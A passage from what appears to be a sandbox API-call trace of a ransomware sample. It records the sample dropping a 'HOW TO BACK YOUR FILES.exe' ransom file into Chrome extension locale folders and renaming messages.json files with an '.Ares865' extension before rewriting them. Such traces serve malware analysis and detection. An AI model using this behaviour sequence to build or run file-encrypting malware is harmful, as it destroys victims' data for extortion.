dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.865] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=357) returned 1 [0101.869] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja" [0101.869] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja" [0101.869] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.869] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.869] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.870] GetLastError () returned 0x0 [0101.870] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.870] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ee1e40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e7aefc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e7aefc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.870] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.870] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.870] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.870] lstrlenW (lpString="messages.json") returned 13 [0101.870] lstrlenW (lpString="Ares865") returned 7 [0101.870] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.870] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.Ares865") returned 160 [0101.871] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.872] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.872] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=251) returned 1 [0101.876] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw" [0101.876] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw" [0101.876] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.876] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.877] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.877] GetLastError () returned 0x0 [0101.877] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.877] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ebbce0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e7d5120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e7d5120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.877] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.877] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.878] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.878] lstrlenW (lpString="messages.json") returned 13 [0101.878] lstrlenW (lpString="Ares865") returned 7 [0101.878] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.878] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.Ares865") returned 160 [0101.878] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.879] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.880] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=362) returned 1 [0101.883] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it" [0101.883] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it" [0101.883] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.884] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.884] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.884] GetLastError () returned 0x0 [0101.885] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.885] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ebbce0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e7d5120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e7d5120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.885] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.885] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.885] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.885] lstrlenW (lpString="messages.json") returned 13 [0101.885] lstrlenW (lpString="Ares865") returned 7 [0101.885] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.885] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.Ares865") returned 160 [0101.885] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.886] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\it\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.887] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=182) returned 1 [0101.890] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is" [0101.890] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is" [0101.891] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.891] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.891] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.891] GetLastError () returned 0x0 [0101.892] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.892] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ebbce0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e7d5120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e7d5120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.892] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.892] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.892] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.892] lstrlenW (lpString="messages.json") returned 13 [0101.892] lstrlenW (lpString="Ares865") returned 7 [0101.892] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.892] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.Ares865") returned 160 [0101.892] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.893] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\is\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.894] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=178) returned 1 [0101.897] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id" [0101.897] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id" [0101.897] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.897] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.898] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.898] GetLastError () returned 0x0 [0101.898] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.898] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ebbce0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e7fb280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e7fb280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.899] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.899] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.899] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.899] lstrlenW (lpString="messages.json") returned 13 [0101.899] lstrlenW (lpString="Ares865") returned 7 [0101.899] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.899] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json.Ares865") returned 160 [0101.899] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local 